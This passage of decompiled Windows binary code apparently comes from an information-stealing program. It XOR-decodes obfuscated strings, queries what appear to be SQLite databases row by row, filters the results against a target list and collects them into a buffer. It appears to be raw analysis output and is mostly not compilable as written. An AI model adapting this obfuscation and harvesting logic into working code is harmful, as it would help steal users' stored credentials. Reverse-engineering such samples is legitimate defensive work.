																_push(_t1369 - 0x17c);
																_t822 = E001E53D1(0, _t1088, _t1257);
																_push(_t1369 - 0x558);
																_t1340 = E001E545D(_t822, _t1388);
																_t824 = _t1369 - 0x1f4;
																__eflags = _t824 - _t1340;
																if(_t824 != _t1340) {
																	E001D2F2D(_t824);
																	E001D3096(_t1369 - 0x1f4, _t1340);
																}
																E001D2F2D(_t1369 - 0x558);
																_t1258 = 0;
																asm("movaps xmm0, [0x23da90]");
																asm("movups [ebp-0x190], xmm0");
																 *((short*)(_t1369 - 0x180)) = 0x2731;
																_t1093 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((char*)(_t1369 - 0x17e)) = 0;
																do {
																	 *(_t1369 + _t1258 - 0x18f) =  *(_t1369 + _t1258 - 0x18f) ^  *(_t1369 - 0x190);
																	_t1258 = _t1258 + 1;
																	__eflags = _t1258 - 0x11;
																} while (_t1258 < 0x11);
																 *((char*)(_t1369 - 0x17e)) = 0;
																_push(_t1369 - 0x18f);
																_t829 = E001E53D1(0, _t1093, _t1258);
																_push(_t1369 - 0x570);
																_t1341 = E001E545D(_t829, _t1388);
																_t831 = _t1369 - 0x23c;
																__eflags = _t831 - _t1341;
																if(_t831 != _t1341) {
																	E001D2F2D(_t831);
																	E001D3096(_t1369 - 0x23c, _t1341);
																}
																E001D2F2D(_t1369 - 0x570);
																_t1097 = 0x46;
																_t1343 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																__eflags =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((intOrPtr*)(_t1369 - 0x95)) = 0x34292046;
																 *((intOrPtr*)(_t1369 - 0x91)) = 0x2433152b;
																_t1259 = 0;
																 *((intOrPtr*)(_t1369 - 0x8d)) = 0x13322f2b;
																 *((short*)(_t1369 - 0x89)) = 0xa14;
																 *((char*)(_t1369 - 0x87)) = 0;
																while(1) {
																	 *(_t1369 + _t1259 - 0x94) =  *(_t1369 + _t1259 - 0x94) ^ _t1097;
																	_t1259 = _t1259 + 1;
																	__eflags = _t1259 - 0xd;
																	if(_t1259 >= 0xd) {
																		break;
																	}
																	_t1097 =  *((intOrPtr*)(_t1369 - 0x95));
																}
																 *((char*)(_t1369 - 0x87)) = 0;
																_push(_t1369 - 0x94);
																_t834 = E001E53D1(0, _t1343, _t1259);
																_push(_t1369 - 0x588);
																_t1344 = E001E545D(_t834, _t1388);
																_t836 = _t1369 - 0x114;
																__eflags = _t836 - _t1344;
																if(_t836 != _t1344) {
																	E001D2F2D(_t836);
																	E001D3096(_t1369 - 0x114, _t1344);
																}
																E001D2F2D(_t1369 - 0x588);
																_t1102 =  *0x24c224; // 0x0
																_t1324 =  *0x24c220; // 0x0
																_t839 = _t1102 - _t1324;
																asm("cdq");
																_t1345 = 0xc;
																 *(_t1369 - 0x1c) = 0;
																__eflags = _t839 / _t1345;
																if(_t839 / _t1345 != 0) {
																	_t1271 =  *0x24c214; // 0x0
																	_t1347 = 0;
																	 *((intOrPtr*)(_t1369 - 0x28)) = 0;
																	 *(_t1369 - 0x2c) = _t1271;
																	do {
																		_t856 =  *(_t1369 - 0x1c);
																		__eflags =  *(_t1271 + _t856 * 4);
																		if( *(_t1271 + _t856 * 4) == 0) {
																			_t862 =  *((intOrPtr*)(_t1324 + _t1347 + 4)) -  *((intOrPtr*)(_t1324 + _t1347));
																			asm("cdq");
																			 *(_t1369 - 0x30) = 0;
																			__eflags = _t862 /  *(_t1369 - 0x34);
																			if(_t862 /  *(_t1369 - 0x34) != 0) {
																				_t1120 =  *((intOrPtr*)(_t1369 - 0x28));
																				_t1348 = 0;
																				do {
																					_t866 = E001D23AD(_t1369 - 0x114,  *((intOrPtr*)(_t1324 + _t1120)) + _t1348, 0);
																					__eflags = _t866 - 0xffffffff;
																					if(_t866 != 0xffffffff) {
																						 *((intOrPtr*)( *(_t1369 - 0x2c) +  *(_t1369 - 0x1c) * 4)) = 1;
																						_t871 =  *0x24c214; // 0x0
																						_t1324 =  *0x24c220; // 0x0
																						 *(_t1369 - 0x2c) = _t871;
																					}
																					_t1120 =  *((intOrPtr*)(_t1369 - 0x28));
																					_t1348 = _t1348 + 0x18;
																					 *(_t1369 - 0x30) =  *(_t1369 - 0x30) + 1;
																					_t868 =  *((intOrPtr*)(_t1324 +  *((intOrPtr*)(_t1369 - 0x28)) + 4)) -  *((intOrPtr*)(_t1324 +  *((intOrPtr*)(_t1369 - 0x28))));
																					asm("cdq");
																					__eflags =  *(_t1369 - 0x30) - _t868 /  *(_t1369 - 0x34);
																				} while ( *(_t1369 - 0x30) < _t868 /  *(_t1369 - 0x34));
																				_t1102 =  *0x24c224; // 0x0
																				_t1347 =  *((intOrPtr*)(_t1369 - 0x28));
																			}
																			_t856 =  *(_t1369 - 0x1c);
																		}
																		_t1347 = _t1347 + 0xc;
																		 *(_t1369 - 0x1c) = _t856 + 1;
																		_t859 = _t1102 - _t1324;
																		 *((intOrPtr*)(_t1369 - 0x28)) = _t1347;
																		asm("cdq");
																		_t1271 =  *(_t1369 - 0x2c);
																		__eflags =  *(_t1369 - 0x1c) - _t859 /  *(_t1369 - 0xb8);
																	} while ( *(_t1369 - 0x1c) < _t859 /  *(_t1369 - 0xb8));
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x228)) - 0x10;
																_t1262 =  >=  ?  *((void*)(_t1369 - 0x23c)) : _t1369 - 0x23c;
																_t1346 = E001E0F09(_t1369 - 0x5b8,  >=  ?  *((void*)(_t1369 - 0x23c)) : _t1369 - 0x23c,  *((intOrPtr*)(_t1369 - 0x228)) - 0x10);
																 *((char*)(_t1369 - 4)) = 0x26;
																__eflags =  *((intOrPtr*)(_t1346 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t1346 + 0x14)) >= 0x10) {
																	_t1346 =  *_t1346;
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x1e0)) - 0x10;
																_t1264 =  >=  ?  *((void*)(_t1369 - 0x1f4)) : _t1369 - 0x1f4;
																_t842 = E001E0F09(_t1369 - 0x5a0,  >=  ?  *((void*)(_t1369 - 0x1f4)) : _t1369 - 0x1f4,  *((intOrPtr*)(_t1369 - 0x1e0)) - 0x10);
																 *((char*)(_t1369 - 4)) = 0x27;
																__eflags =  *((intOrPtr*)(_t842 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t842 + 0x14)) >= 0x10) {
																	_t842 =  *_t842;
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x100)) - 0x10;
																_push(_t1346);
																_t1106 =  >=  ?  *((void*)(_t1369 - 0x114)) : _t1369 - 0x114;
																__eflags =  >=  ?  *((void*)(_t1369 - 0x114)) : _t1369 - 0x114;
																_t1330 = L001F5FB1( >=  ?  *((void*)(_t1369 - 0x114)) : _t1369 - 0x114, _t842);
																E001D2F2D(_t1369 - 0x5a0);
																 *((char*)(_t1369 - 4)) = 0x25;
																E001D2F2D(_t1369 - 0x5b8);
																_t1110 = 0x30;
																 *((intOrPtr*)(_t1369 - 0x44)) = 0x767f6330;
																 *((intOrPtr*)(_t1369 - 0x40)) = 0x100a64;
																_t1266 = 0;
																while(1) {
																	 *(_t1369 + _t1266 - 0x43) =  *(_t1369 + _t1266 - 0x43) ^ _t1110;
																	_t1266 = _t1266 + 1;
																	__eflags = _t1266 - 6;
																	if(_t1266 >= 6) {
																		break;
																	}
																	_t1110 =  *((intOrPtr*)(_t1369 - 0x44));
																}
																 *((intOrPtr*)(_t1369 - 0x2f8)) = 0;
																 *((char*)(_t1369 - 0x3d)) = 0;
																 *((intOrPtr*)(_t1369 - 0x2e8)) = 0;
																 *((intOrPtr*)(_t1369 - 0x2e4)) = 0xf;
																 *((char*)(_t1369 - 0x2f8)) = 0;
																L001D2F8E(_t1369 - 0x43);
																 *((char*)(_t1369 - 4)) = 0x28;
																E001D3B98(E001D3D59(_t1369 - 0x2f8),  *((intOrPtr*)(_t1369 - 0xb4)));
																E001D3D59(0x2485a0);
																 *((char*)(_t1369 - 4)) = 0x25;
																E001D2F2D(_t1369 - 0x2f8);
																E001D3B98(0x24c240, _t1330);
																 *0x24c208 =  *0x24c208 + 1;
																__eflags =  *0x24c208;
																E001D2F2D(_t1369 - 0x114);
																E001D2F2D(_t1369 - 0x23c);
																_t1119 = _t1369 - 0x1f4;
																goto L147;
															}
														}
													}
												} else {
													_t1275 = 0x1a;
													 *((intOrPtr*)(_t1369 - 0x52)) = 0x6975721a;
													 *((intOrPtr*)(_t1369 - 0x4e)) = 0x777b746e;
													_t1129 = 0;
													 *((short*)(_t1369 - 0x4a)) = 0x7f;
													while(1) {
														 *(_t1369 + _t1129 - 0x51) =  *(_t1369 + _t1129 - 0x51) ^ _t1275;
														_t1129 = _t1129 + 1;
														__eflags = _t1129 - 8;
														if(_t1129 >= 8) {
															break;
														}
														_t1275 =  *((intOrPtr*)(_t1369 - 0x52));
													}
													 *((char*)(_t1369 - 0x49)) = 0;
													_push(_t1369 - 0x51);
													_t879 = E001E53D1(0, _t1330, _t1275);
													__eflags =  *_t879;
													if( *_t879 != 0) {
														_t1276 = 0;
														asm("movaps xmm0, [0x23daa0]");
														asm("movups [ebp-0x1a3], xmm0");
														 *((short*)(_t1369 - 0x193)) = 0x343c;
														_t1132 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
														 *((char*)(_t1369 - 0x191)) = 0;
														do {
															 *(_t1369 + _t1276 - 0x1a2) =  *(_t1369 + _t1276 - 0x1a2) ^  *(_t1369 - 0x1a3);
															_t1276 = _t1276 + 1;
															__eflags = _t1276 - 0x11;
														} while (_t1276 < 0x11);
														 *((char*)(_t1369 - 0x191)) = 0;
														_push(_t1369 - 0x1a2);
														_t883 = E001E53D1(0, _t1132, _t1276);
														__eflags =  *_t883;
														if( *_t883 != 0) {
															_t1349 = 0;
															asm("movaps xmm0, [0x23d9b0]");
															asm("movups [ebp-0x1b6], xmm0");
															 *((short*)(_t1369 - 0x1a6)) = 0x1402;
															_t1134 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
															 *((char*)(_t1369 - 0x1a4)) = 0;
															do {
																_t1277 =  *(_t1369 - 0x1b6);
																 *(_t1369 + _t1349 - 0x1b5) =  *(_t1369 + _t1349 - 0x1b5) ^  *(_t1369 - 0x1b6);
																_t1349 = _t1349 + 1;
																__eflags = _t1349 - 0x11;
															} while (_t1349 < 0x11);
															 *((char*)(_t1369 - 0x1a4)) = 0;
															_push(_t1369 - 0x1b5);
															_t885 = E001E53D1(0, _t1134, _t1277);
															__eflags =  *_t885;
															if( *_t885 != 0) {
																_t886 = 0xf;
																 *((intOrPtr*)(_t1369 - 0x224)) = 0;
																 *((intOrPtr*)(_t1369 - 0x214)) = 0;
																 *((intOrPtr*)(_t1369 - 0x210)) = _t886;
																 *((char*)(_t1369 - 0x224)) = 0;
																 *((intOrPtr*)(_t1369 - 0x20c)) = 0;
																 *((intOrPtr*)(_t1369 - 0x1fc)) = 0;
																 *((intOrPtr*)(_t1369 - 0x1f8)) = _t886;
																 *((char*)(_t1369 - 0x20c)) = 0;
																 *((intOrPtr*)(_t1369 - 0x134)) = 0;
																 *((intOrPtr*)(_t1369 - 0x124)) = 0;
																 *((intOrPtr*)(_t1369 - 0x120)) = _t886;
																 *((char*)(_t1369 - 0x134)) = 0;
																 *((char*)(_t1369 - 4)) = 0x1f;
																_t1278 = 0;
																asm("movaps xmm0, [0x23d960]");
																asm("movups [ebp-0x1c9], xmm0");
																 *((short*)(_t1369 - 0x1b9)) = 0x121a;
																_t1136 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((char*)(_t1369 - 0x1b7)) = 0;
																do {
																	 *(_t1369 + _t1278 - 0x1c8) =  *(_t1369 + _t1278 - 0x1c8) ^  *(_t1369 - 0x1c9);
																	_t1278 = _t1278 + 1;
																	__eflags = _t1278 - 0x11;
																} while (_t1278 < 0x11);
																 *((char*)(_t1369 - 0x1b7)) = 0;
																_push(_t1369 - 0x1c8);
																_t890 = E001E53D1(0, _t1136, _t1278);
																_push(_t1369 - 0x4e0);
																_t1350 = E001E545D(_t890, _t1388);
																_t892 = _t1369 - 0x224;
																__eflags = _t892 - _t1350;
																if(_t892 != _t1350) {
																	E001D2F2D(_t892);
																	E001D3096(_t1369 - 0x224, _t1350);
																}
																E001D2F2D(_t1369 - 0x4e0);
																_t1279 = 0;
																asm("movaps xmm0, [0x23dc10]");
																asm("movups [ebp-0x1dc], xmm0");
																 *((short*)(_t1369 - 0x1cc)) = 0x4452;
																_t1141 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((char*)(_t1369 - 0x1ca)) = 0;
																do {
																	 *(_t1369 + _t1279 - 0x1db) =  *(_t1369 + _t1279 - 0x1db) ^  *(_t1369 - 0x1dc);
																	_t1279 = _t1279 + 1;
																	__eflags = _t1279 - 0x11;
																} while (_t1279 < 0x11);
																 *((char*)(_t1369 - 0x1ca)) = 0;
																_push(_t1369 - 0x1db);
																_t897 = E001E53D1(0, _t1141, _t1279);
																_push(_t1369 - 0x4f8);
																_t1351 = E001E545D(_t897, _t1388);
																_t899 = _t1369 - 0x20c;
																__eflags = _t899 - _t1351;
																if(_t899 != _t1351) {
																	E001D2F2D(_t899);
																	E001D3096(_t1369 - 0x20c, _t1351);
																}
																E001D2F2D(_t1369 - 0x4f8);
																_t1280 = 0x26;
																_t1353 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																__eflags =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((intOrPtr*)(_t1369 - 0x5c)) = 0x55494e26;
																 *((intOrPtr*)(_t1369 - 0x58)) = 0x4b474852;
																_t1145 = 0;
																 *((short*)(_t1369 - 0x54)) = 0x43;
																while(1) {
																	 *(_t1369 + _t1145 - 0x5b) =  *(_t1369 + _t1145 - 0x5b) ^ _t1280;
																	_t1145 = _t1145 + 1;
																	__eflags = _t1145 - 8;
																	if(_t1145 >= 8) {
																		break;
																	}
																	_t437 = _t1369 - 0x5c; // 0x55494e26
																	_t1280 =  *_t437;
																}
																 *((char*)(_t1369 - 0x53)) = 0;
																_push(_t1369 - 0x5b);
																_t902 = E001E53D1(0, _t1353, _t1280);
																_push(_t1369 - 0x510);
																_t1354 = E001E545D(_t902, _t1388);
																_t904 = _t1369 - 0x134;
																__eflags = _t904 - _t1354;
																if(_t904 != _t1354) {
																	E001D2F2D(_t904);
																	E001D3096(_t1369 - 0x134, _t1354);
																}
																E001D2F2D(_t1369 - 0x510);
																_t1150 =  *0x24c224; // 0x0
																_t1326 =  *0x24c220; // 0x0
																_t907 = _t1150 - _t1326;
																asm("cdq");
																_t1355 = 0xc;
																 *(_t1369 - 0x1c) = 0;
																__eflags = _t907 / _t1355;
																if(_t907 / _t1355 != 0) {
																	_t1289 =  *0x24c214; // 0x0
																	_t1357 = 0;
																	 *((intOrPtr*)(_t1369 - 0x28)) = 0;
																	 *(_t1369 - 0x30) = _t1289;
																	do {
																		_t925 =  *(_t1369 - 0x1c);
																		__eflags =  *(_t1289 + _t925 * 4);
																		if( *(_t1289 + _t925 * 4) == 0) {
																			_t931 =  *((intOrPtr*)(_t1326 + _t1357 + 4)) -  *((intOrPtr*)(_t1326 + _t1357));
																			asm("cdq");
																			 *(_t1369 - 0x2c) = 0;
																			__eflags = _t931 /  *(_t1369 - 0x34);
																			if(_t931 /  *(_t1369 - 0x34) != 0) {
																				_t1167 =  *((intOrPtr*)(_t1369 - 0x28));
																				_t1358 = 0;
																				do {
																					_t935 = E001D23AD(_t1369 - 0x134,  *((intOrPtr*)(_t1326 + _t1167)) + _t1358, 0);
																					__eflags = _t935 - 0xffffffff;
																					if(_t935 != 0xffffffff) {
																						 *((intOrPtr*)( *(_t1369 - 0x30) +  *(_t1369 - 0x1c) * 4)) = 1;
																						_t940 =  *0x24c214; // 0x0
																						_t1326 =  *0x24c220; // 0x0
																						 *(_t1369 - 0x30) = _t940;
																					}
																					_t1167 =  *((intOrPtr*)(_t1369 - 0x28));
																					_t1358 = _t1358 + 0x18;
																					 *(_t1369 - 0x2c) =  *(_t1369 - 0x2c) + 1;
																					_t937 =  *((intOrPtr*)(_t1326 +  *((intOrPtr*)(_t1369 - 0x28)) + 4)) -  *((intOrPtr*)(_t1326 +  *((intOrPtr*)(_t1369 - 0x28))));
																					asm("cdq");
																					__eflags =  *(_t1369 - 0x2c) - _t937 /  *(_t1369 - 0x34);
																				} while ( *(_t1369 - 0x2c) < _t937 /  *(_t1369 - 0x34));
																				_t1150 =  *0x24c224; // 0x0
																				_t1357 =  *((intOrPtr*)(_t1369 - 0x28));
																			}
																			_t925 =  *(_t1369 - 0x1c);
																		}
																		_t1357 = _t1357 + 0xc;
																		 *(_t1369 - 0x1c) = _t925 + 1;
																		_t928 = _t1150 - _t1326;
																		 *((intOrPtr*)(_t1369 - 0x28)) = _t1357;
																		asm("cdq");
																		_t1289 =  *(_t1369 - 0x30);
																		__eflags =  *(_t1369 - 0x1c) - _t928 /  *(_t1369 - 0xb8);
																	} while ( *(_t1369 - 0x1c) < _t928 /  *(_t1369 - 0xb8));
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x1f8)) - 0x10;
																_t1283 =  >=  ?  *((void*)(_t1369 - 0x20c)) : _t1369 - 0x20c;
																_t1356 = E001E0F09(_t1369 - 0x540,  >=  ?  *((void*)(_t1369 - 0x20c)) : _t1369 - 0x20c,  *((intOrPtr*)(_t1369 - 0x1f8)) - 0x10);
																 *((char*)(_t1369 - 4)) = 0x20;
																__eflags =  *((intOrPtr*)(_t1356 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t1356 + 0x14)) >= 0x10) {
																	_t1356 =  *_t1356;
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x210)) - 0x10;
																_t1285 =  >=  ?  *((void*)(_t1369 - 0x224)) : _t1369 - 0x224;
																_t910 = E001E0F09(_t1369 - 0x528,  >=  ?  *((void*)(_t1369 - 0x224)) : _t1369 - 0x224,  *((intOrPtr*)(_t1369 - 0x210)) - 0x10);
																 *((char*)(_t1369 - 4)) = 0x21;
																__eflags =  *((intOrPtr*)(_t910 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t910 + 0x14)) >= 0x10) {
																	_t910 =  *_t910;
																}
																__eflags =  *((intOrPtr*)(_t1369 - 0x120)) - 0x10;
																_push(_t1356);
																_t1154 =  >=  ?  *((void*)(_t1369 - 0x134)) : _t1369 - 0x134;
																_t1330 = L001F5FB1( >=  ?  *((void*)(_t1369 - 0x134)) : _t1369 - 0x134, _t910);
																E001D2F2D(_t1369 - 0x528);
																_t1157 = _t1369 - 0x540;
																 *((char*)(_t1369 - 4)) = 0x1f;
																E001D2F2D(_t1157);
																_push(_t1157);
																E001D16B4(_t1369 - 0x668);
																 *((char*)(_t1369 - 4)) = 0x22;
																_t1159 = 0;
																asm("movaps xmm0, [0x23da10]");
																asm("movups [ebp-0x24d], xmm0");
																 *((char*)(_t1369 - 0x23d)) = 0;
																do {
																	 *(_t1369 + _t1159 - 0x24c) =  *(_t1369 + _t1159 - 0x24c) ^  *(_t1369 - 0x24d);
																	_t1159 = _t1159 + 1;
																	__eflags = _t1159 - 0xf;
																} while (_t1159 < 0xf);
																 *((char*)(_t1369 - 0x23d)) = 0;
																_t1160 = E001F5C6D();
																_t918 = L001F57CC(_t1160, _t1369 - 0x24c);
																_push(_t1160);
																_push(_t1160);
																E001D1624(_t1369 - 0x668, __eflags, _t918);
																E001D3B98(_t1369 - 0x668, _t1330);
																E001D15F4(_t1369 - 0x668);
																E001D0602(_t1369 - 0x668);
																E001D2F2D(_t1369 - 0x134);
																E001D2F2D(_t1369 - 0x20c);
																_t1119 = _t1369 - 0x224;
																L147:
																 *((char*)(_t1369 - 4)) = 0x1c;
																E001D2F2D(_t1119);
															}
														}
													}
												}
												_t1252 =  *(_t1369 - 0x24) + 1;
												 *(_t1369 - 0x24) = _t1252;
											}
											E001E38F2(_t1369 - 0xb0, _t1252);
											_t1321 =  *(_t1369 - 0x144);
										}
										L002001B3( *(_t1369 - 0x140));
										_push(_t1321);
										E002051DD(0, _t1321, _t1330, __eflags);
										E001E3876(0, _t1369 - 0x354, _t1252);
										_t1075 = _t1369 - 0xe0;
										goto L151;
									}
								}
							} else {
								asm("movaps xmm0, [0x23dd30]");
								_t1293 = 0;
								asm("movups [ebp-0x25e], xmm0");
								 *((char*)(_t1369 - 0x24e)) = 0;
								_t1359 = 0xf;
								do {
									_t1177 =  *(_t1369 - 0x25e) ^  *(_t1369 + _t1293 - 0x25d);
									 *(_t1369 + _t1293 - 0x25d) = _t1177;
									_t1293 = _t1293 + 1;
									__eflags = _t1293 - _t1359;
								} while (_t1293 < _t1359);
								 *((char*)(_t1369 - 0x24e)) = 0;
								E001D3654(_t1320, _t1369 - 0x3cc);
								_t951 =  *(_t1369 - 0x18) | 0x00080000;
								 *(_t1369 - 0x18) = _t951;
								 *(_t1369 - 0x20) = _t951;
								 *((char*)(_t1369 - 4)) = 0xb;
								__eflags =  *((intOrPtr*)(_t1369 - 0x3b8)) - 0x10;
								_t1180 =  >=  ?  *((void*)(_t1369 - 0x3cc)) : _t1369 - 0x3cc;
								_t952 = L001F57CC( >=  ?  *((void*)(_t1369 - 0x3cc)) : _t1369 - 0x3cc, _t1369 - 0x25d);
								 *((intOrPtr*)(_t1369 - 0x2e0)) = 0;
								 *((intOrPtr*)(_t1369 - 0x2d0)) = 0;
								 *((intOrPtr*)(_t1369 - 0x2cc)) = _t1359;
								 *((char*)(_t1369 - 0x2e0)) = 0;
								L001D2F8E(_t952);
								 *((char*)(_t1369 - 4)) = 0xd;
								E001D2F2D(_t1369 - 0x3cc);
								_t1295 = 9;
								E001F5BFA(_t1369 - 0x2b0, _t1295, _t1320, __eflags);
								 *((char*)(_t1369 - 4)) = 0xe;
								__eflags =  *((intOrPtr*)(_t1369 - 0x29c)) - 0x10;
								_t1330 =  >=  ?  *((void*)(_t1369 - 0x2b0)) : _t1369 - 0x2b0;
								_t956 = E001F5C6D();
								_t1296 =  >=  ?  *((void*)(_t1369 - 0x2b0)) : _t1369 - 0x2b0;
								_t957 = L001F57CC(_t956,  >=  ?  *((void*)(_t1369 - 0x2b0)) : _t1369 - 0x2b0);
								 *((intOrPtr*)(_t1369 - 0x298)) = 0;
								 *((intOrPtr*)(_t1369 - 0x288)) = 0;
								 *((intOrPtr*)(_t1369 - 0x284)) = 0xf;
								 *((char*)(_t1369 - 0x298)) = 0;
								L001D2F8E(_t957);
								 *((char*)(_t1369 - 0x11c)) = 0;
								 *((char*)(_t1369 - 4)) = 0xf;
								E001D4B70(_t1369 - 0x298);
								 *((char*)(_t1369 - 0x118)) = 0;
								 *((char*)(_t1369 - 4)) = 0x10;
								E001D4B70(_t1369 - 0x2e0);
								 *((char*)(_t1369 - 4)) = 0x11;
								E001CB1D6(0, _t1369 - 0x468, _t1369 - 0x480,  *((intOrPtr*)(_t1369 - 0x118)));
								E001D2D4F(_t1369 - 0x468);
								 *((char*)(_t1369 - 4)) = 0xf;
								E001D2D4F(_t1369 - 0x480);
								__eflags =  *((intOrPtr*)(_t1369 - 0x29c)) - 0x10;
								_t965 =  >=  ?  *((void*)(_t1369 - 0x2b0)) : _t1369 - 0x2b0;
								_t966 =  *((intOrPtr*)( *0x24c1cc))( >=  ?  *((void*)(_t1369 - 0x2b0)) : _t1369 - 0x2b0, _t1369 - 0xbc,  *((intOrPtr*)(_t1369 - 0x11c)), _t1177);
								__eflags = _t966;
								if(_t966 == 0) {
									asm("movaps xmm0, [0x23da40]");
									_t1301 = 0;
									asm("movups [ebp-0x344], xmm0");
									 *((intOrPtr*)(_t1369 - 0x304)) = 0x392c2e63;
									asm("movaps xmm0, [0x23db00]");
									asm("movups [ebp-0x334], xmm0");
									 *((intOrPtr*)(_t1369 - 0x300)) = 0x242c2f1c;
									asm("movaps xmm0, [0x23da80]");
									asm("movups [ebp-0x324], xmm0");
									 *((intOrPtr*)(_t1369 - 0x2fc)) = 0x302d2a;
									asm("movaps xmm0, [0x23d900]");
									asm("movups [ebp-0x314], xmm0");
									do {
										 *(_t1369 + _t1301 - 0x343) =  *(_t1369 + _t1301 - 0x343) ^  *(_t1369 - 0x344);
										_t1301 = _t1301 + 1;
										__eflags = _t1301 - 0x4a;
									} while (_t1301 < 0x4a);
									 *((char*)(_t1369 - 0x2f9)) = 0;
									_t970 =  *((intOrPtr*)( *0x24c1dc))( *((intOrPtr*)(_t1369 - 0xbc)), _t1369 - 0x343, 0xffffffff, _t1369 - 0x48, 0);
									_t1373 = _t1373 + 0x14;
									__eflags = _t970;
									if(_t970 == 0) {
										while(1) {
											_t975 =  *((intOrPtr*)( *0x24c1d0))( *((intOrPtr*)(_t1369 - 0x48)));
											__eflags = _t975 - 0x64;
											if(_t975 != 0x64) {
												goto L48;
											}
											_t977 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t1369 - 0x48)), 0);
											 *(_t1369 - 0x1c) = _t977;
											_t979 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t1369 - 0x48)), 1);
											 *((intOrPtr*)(_t1369 - 0x28)) = _t979;
											_t981 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t1369 - 0x48)), 2);
											_t1211 =  *0x24c220; // 0x0
											_t1327 = 0;
											 *(_t1369 - 0x2c) = _t981;
											_t1361 = 0xc;
											while(1) {
												_t982 =  *0x24c224; // 0x0
												asm("cdq");
												__eflags = _t1327 - (_t982 - _t1211) / _t1361;
												if(__eflags >= 0) {
													break;
												}
												_t997 =  *0x24c214; // 0x0
												__eflags =  *(_t997 + _t1327 * 4);
												if( *(_t997 + _t1327 * 4) == 0) {
													_t1363 = 0;
													 *(_t1369 - 0x30) = 0;
													while(1) {
														_t1311 = _t1327 * 0xc;
														 *(_t1369 - 0x24) = _t1311;
														_t999 =  *((intOrPtr*)(_t1211 + _t1311 + 4)) -  *((intOrPtr*)(_t1211 + _t1311));
														asm("cdq");
														__eflags = _t1363 - _t999 /  *(_t1369 - 0x34);
														if(_t1363 >= _t999 /  *(_t1369 - 0x34)) {
															break;
														}
														 *((intOrPtr*)(_t1369 - 0x36c)) = 0;
														 *((intOrPtr*)(_t1369 - 0x35c)) = 0;
														 *((intOrPtr*)(_t1369 - 0x358)) = 0xf;
														L001D2F8E( *(_t1369 - 0x2c));
														_t1002 =  *0x24c220; // 0x0
														_t1003 = E001D23AD(_t1369 - 0x36c, _t1363 * 0x18 +  *((intOrPtr*)(_t1002 +  *(_t1369 - 0x24))), 0);
														E001D2F2D(_t1369 - 0x36c);
														__eflags = _t1003 - 0xffffffff;
														if(_t1003 != 0xffffffff) {
															_t1005 =  *0x24c214; // 0x0
															 *((intOrPtr*)(_t1005 + _t1327 * 4)) = 1;
														}
														_t1211 =  *0x24c220; // 0x0
														_t1363 =  *(_t1369 - 0x30) + 1;
														 *(_t1369 - 0x30) = _t1363;
													}
													_t1361 = 0xc;
												}
												_t1327 = _t1327 + 1;
											}
											_t1362 = E001E0F09(_t1369 - 0x4c8,  *((intOrPtr*)(_t1369 - 0x28)), __eflags);
											 *((char*)(_t1369 - 4)) = 0x12;
											__eflags =  *((intOrPtr*)(_t1362 + 0x14)) - 0x10;
											if(__eflags >= 0) {
												_t1362 =  *_t1362;
											}
											_t986 = E001E0F09(_t1369 - 0x4b0,  *(_t1369 - 0x1c), __eflags);
											 *((char*)(_t1369 - 4)) = 0x13;
											__eflags =  *((intOrPtr*)(_t986 + 0x14)) - 0x10;
											if( *((intOrPtr*)(_t986 + 0x14)) >= 0x10) {
												_t986 =  *_t986;
											}
											_push(_t1362);
											_t1330 = L001F5FB1( *(_t1369 - 0x2c), _t986);
											E001D2F2D(_t1369 - 0x4b0);
											 *((char*)(_t1369 - 4)) = 0xf;
											E001D2F2D(_t1369 - 0x4c8);
											_t1218 = 3;
											 *((intOrPtr*)(_t1369 - 0x3c)) = 0x454c5003;
											 *((intOrPtr*)(_t1369 - 0x38)) = 0x233957;
											_t1306 = 0;
											while(1) {
												 *(_t1369 + _t1306 - 0x3b) =  *(_t1369 + _t1306 - 0x3b) ^ _t1218;
												_t1306 = _t1306 + 1;
												__eflags = _t1306 - 6;
												if(_t1306 >= 6) {
													break;
												}
												_t1218 =  *((intOrPtr*)(_t1369 - 0x3c));
											}
											 *((intOrPtr*)(_t1369 - 0x2c8)) = 0;
											 *((char*)(_t1369 - 0x35)) = 0;
											 *((intOrPtr*)(_t1369 - 0x2b8)) = 0;
											 *((intOrPtr*)(_t1369 - 0x2b4)) = 0xf;
											 *((char*)(_t1369 - 0x2c8)) = 0;
											L001D2F8E(_t1369 - 0x3b);
											 *((char*)(_t1369 - 4)) = 0x14;
											E001D3B98(E001D3D59(_t1369 - 0x2c8),  *((intOrPtr*)(_t1369 - 0xb4)));
											E001D3D59(0x2485a0);
											 *((char*)(_t1369 - 4)) = 0xf;
											E001D2F2D(_t1369 - 0x2c8);
											E001D3B98(0x24c240, _t1330);
											 *0x24c208 =  *0x24c208 + 1;
										}
									}
									L48:
									 *0x24c1fc( *((intOrPtr*)(_t1369 - 0x48)));
									 *0x24c1ec( *((intOrPtr*)(_t1369 - 0xbc)));
									E001CB7A7(_t1369 - 0x298);
								}
								E001D2F2D(_t1369 - 0x298);
								E001D2F2D(_t1369 - 0x2b0);
								_t1075 = _t1369 - 0x2e0;
								L151:
								 *((char*)(_t1369 - 4)) = 5;
								E001D2F2D(_t1075);
							}
							 *0x24c1f4();
						}
					}
					 *((intOrPtr*)(_t1369 - 4)) = 4;
					E001CACAE(0, _t1369 - 0xf0, _t1330, __eflags);
					_t1032 =  *(_t1369 - 0xc0);
				}
				__eflags = _t1032;
				if(_t1032 != 0) {
